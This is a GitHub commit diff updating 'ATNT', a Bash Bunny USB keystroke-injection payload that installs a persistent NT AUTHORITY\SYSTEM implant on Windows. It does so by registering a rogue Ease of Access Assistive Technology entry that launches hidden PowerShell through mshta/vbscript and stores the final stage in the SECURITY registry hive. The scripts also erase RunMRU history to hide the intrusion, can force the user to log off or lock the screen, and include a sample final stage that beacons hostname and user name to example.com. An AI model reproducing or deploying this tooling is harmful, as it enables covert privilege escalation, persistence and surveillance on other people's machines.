ATNT update: working version (#461)

* Delete stage3.ps1

* Update ATNT to work as intended.

Update ATNT to work as intended. Requires reboot or logoff to fully register AT.

* Remove DONE file in cleanup.

Forgot to remove DONE file.  Now also makes sure this file does not exist before running.
pull/462/head
9o3 2021-08-18 17:37:59 +02:00 committed by GitHub
parent 4f6cd4b54d
commit 1efd6a1116
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 136 additions and 104 deletions

View File

@ -0,0 +1,18 @@
# ATNT : Persistent NT AUTHORITY\SYSTEM implant
Uses Windows [Ease of Access Assistive Technology](https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) to persistently run code with NT AUTHORITY\SYSTEM rights.
## Options
### :warning: FORCE_LOGOFF
> Ease of Access Assistive Technologies (ATs) are only callable after a restart or logoff. Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
### :warning: LOCK_ON_USER
> After the AT has been successfully registered (target machine has rebooted or user has been logged off), the AT will be launched when the user first logs in. The AT is ran as User, and thus can not complete its installation. Setting this setting to true will lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once.
### RUN_IMMEDIATELY
> When the AT is first launched as NT AUTHORITY/SYSTEM, the final stage is written to the SECURITY registry hive. Only NT AUTHORITY/SYSTEM has access to this hive. Setting this setting to true will also immediately run the final stage, instead of waiting for a second switch to a Secure Desktop to launch the final stage.
## final_stage.ps1
The final_stage.ps1 file is merged into the second stage. Usage of `@"\n..."@\n` is therefore not possible. Variable definition and usage should be escaped as follows:
```powershell
`$example = 1;
Write-Host `$example;
```

View File

@ -1 +1,2 @@
iwr ('https://example.com/beacon_'+(whoami)) <#([WmiClass]'Win32_Process').Create('powershell -NoE -NoP whoami');#>
iwr ("example.com/{0}:{1}" -f (hostname),(whoami))

View File

@ -1,86 +1,75 @@
#!/bin/bash #!/bin/bash
# #
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant # Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) # Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
# To persistently run code with NT AUTHORITY\SYSTEM rights. # To persistently run code with NT AUTHORITY\SYSTEM rights.
# Author: 9o3 # Author: 9o3
# Twitter: @BugBot4 # Twitter: @BugBot4
# Version: 1.0 # Version: 1.1
# Category: Execution # Category: Execution
# Attackmodes: HID, Storage # Attackmodes: HID, Storage
# #
# LED STATUS # LED STATUS
# ========== # ==========
# SETUP.......Generate stage files # SETUP.......Generate stage file
# STAGE1......Run hidden elevated PowerShell window that creates the AT # ATTACK......Run hidden elevated PowerShell window that creates the AT and drops associated code
# STAGE2......Trigger the newly created AT # CLEANUP.....Remove generated files
# STAGE3......Update the newly created AT to run the final stage # FINISH......Finished
# STAGE4......(OPTIONAL) Trigger the updated AT to run the final stage #
# CLEANUP.....Remove generated files # OPTIONS
# FINISH......Finished # =======
# # Final stage configured from included final_stage.ps1 script
# OPTIONS # FORCE_LOGOFF => Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
# ======= # LOCK_ON_USER => Lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once. Doing this starts the AT as NT AUTHORITY/SYSTEM.
# Final stage configured from included final_stage.ps1 script # RUN_IMMEDIATELY => Run the final stage as soon as the AT is ran as NT AUTHORITY/SYSTEM, instead of running it after it has been called from the SECURITY hive.
# run_final_stage => Setting this to false will instead trigger the final stage when the user switches to a Secure Desktop FORCE_LOGOFF=true
run_final_stage=true LOCK_ON_USER=true
RUN_IMMEDIATELY=true
LED SETUP
GET SWITCH_POSITION ######## Generate stage file ########
cd /root/udisk/payloads/ # Alter second stage based on settings & merge final stage.ps1 into second stage
cd $SWITCH_POSITION LED SETUP
sed "s/!SWITCH!/$SWITCH_POSITION/g" stage2.ps1 > 2 GET SWITCH_POSITION
sed '/!FINAL_STAGE!/{ rm /root/udisk/DONE
s/!FINAL_STAGE!//g cd /root/udisk/payloads/$SWITCH_POSITION
r final_stage.ps1 if [ "$RUN_IMMEDIATELY" = true ] ; then
}' stage3.ps1 > 3 RUN_IMMEDIATELY_TEXT='iex `$p'
fi
ATTACKMODE HID STORAGE if [ "$LOCK_ON_USER" = true ] ; then
LOCK_ON_USER_TEXT='rundll32.exe user32.dll,LockWorkStation;'
######## Run hidden elevated PowerShell window ######## fi
# Runs hidden elevated powershell which executes stage2.ps1 if [ "$FORCE_LOGOFF" = true ] ; then
LED STAGE1 FORCE_LOGOFF_TEXT='(Get-WmiObject -Class Win32_OperatingSystem).Win32Shutdown(4)'
QUACK GUI r fi
QUACK DELAY 500
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)" sed -e "s/#RI#/$RUN_IMMEDIATELY_TEXT/g" -e "s/<#LI#>/$LOCK_ON_USER_TEXT/g" -e "s/#FL#/$FORCE_LOGOFF_TEXT/g" -e '/!FINAL_STAGE!/{
QUACK DELAY 200 s/!FINAL_STAGE!//g
QUACK CTRL-SHIFT ENTER r final_stage.ps1
QUACK DELAY 750 }' stage2.ps1 > 2
QUACK LEFTARROW
QUACK DELAY 100 ATTACKMODE HID STORAGE
QUACK ENTER
######## Run hidden elevated PowerShell window ########
######## Trigger the newly created AT ######## # Runs hidden elevated powershell which executes stage2.ps1
# ATs are tirggered by a desktop switch. Secure Desktops launch ATs as NT AUTHORITY\SYSTEM LED STAGE1
# The AT gets and executes stage3.ps1 QUACK GUI r
LED STAGE2 QUACK DELAY 500
QUACK DELAY 1000 QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
QUACK CTRL-ALT DEL QUACK DELAY 200
QUACK DELAY 750 QUACK CTRL-SHIFT ENTER
QUACK ESC QUACK DELAY 1200
QUACK LEFTARROW
######## Update the newly created AT ######## QUACK DELAY 200
# Write the content of final_stage.ps1 to the SECURITY hive, which is only readable as NT AUTHORITY\SYSTEM QUACK ENTER
# Updates the newly created AT to read and execute the final stage from the SECURITY hive until [ -f /root/udisk/DONE ]
LED STAGE3 do
until [ -f /root/udisk/DONE ] sleep 0.2
do done
sleep 0.2
done ######## Remove generated files ########
if [ "$run_final_stage" = true ] ; then # Removes the generated stage file and sync file system
######## Trigger the updated AT ######## LED CLEANUP
# Trigger the updated AT as NT AUTHORITY\SYSTEM and execute the final stage rm 2
LED STAGE4 rm /root/udisk/DONE
QUACK CTRL-ALT DEL sync
QUACK DELAY 750 LED FINISH
QUACK ESC
fi
######## Remove generated files ########
# Removes the generated stages and the DONE file used to indicate the end of the third stage
LED CLEANUP
rm /root/udisk/DONE
rm 2
rm 3
sync
LED FINISH

View File

@ -1,5 +1,5 @@
#Remove latest run entry #Remove latest run entry
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=(gp $p).$m; rp $p $l[0]; sp $p $m $l.Substring(1); $p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
# Create AT to run next stage # Create AT to run next stage
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" $at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
@ -8,7 +8,45 @@ New-Item -Path $at -Name "atnt" -Force
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
New-ItemProperty -Path $atnt -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\!SWITCH!\3')-Raw)"",0)(Window.Close))" -PropertyType "String" -Force New-ItemProperty -Path $atnt -Name "StartParams" -Value ("vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP ([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 0)')"",0)(Window.Close))") -PropertyType "String" -Force
# The value of this is ran when the AT is launched.
# If the AT is launched with user privilages, lock the workstation. This trigger the AT to be launched a second time as NT AUTHORITY/SYSTEM.
# When launched as NT AUTHORITY/SYSTEM, the next stage is retrieved from the registry and ran.
New-ItemProperty -Path $atnt -Name "0" -Value @"
if((whoami) -ne 'NT AUTHORITY\SYSTEM'){<#LI#>exit;}
iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 1)
"@
# The value of this is ran when the AT is launched with NT AUTHORITY/SYSTEM rights.
# Uses Set-Alias and short variable names to fit payload in a single registry entry.
New-ItemProperty -Path $atnt -Name "1" -Value @"
`$a = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt";
`$p = gpv `$a 2;
sal nip New-ItemProperty;
sal rip Remove-ItemProperty;
ni -Path "HKLM:\SECURITY\Policy" -Name PolAtnt -Force;
nip -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value `$p -PropertyType "string" -Force;
nip -Path `$a -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force;
rip -Path `$a -Name "2" -Force;
rip -Path `$a -Name "1" -Force;
rip -Path `$a -Name "0" -Force;
#RI#
"@
# The final stage is later written to the SECURITY hive, this hive is only visible by NT AUTHORITY/SYSTEM.
New-ItemProperty -Path $atnt -Name "2" -Value @"
!FINAL_STAGE!
"@
#Add the newly created AT to automatically start on a desktop switch. #Add the newly created AT to automatically start on a desktop switch.
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force;
#Let the Bash Bunny know we're done here & Eject.
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
New-Item -ItemType file $bb"DONE";
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
#FL#

View File

@ -1,14 +0,0 @@
$payload = @"
!FINAL_STAGE!
"@
New-Item -Path "HKLM:\SECURITY\Policy" -Name "PolAtnt" -Force
New-ItemProperty -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value $payload -PropertyType "string" -Force
# The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes.
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt" -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force
#Let the Bash Bunny know we're done here & Eject.
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
New-Item -ItemType file $bb"DONE";
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");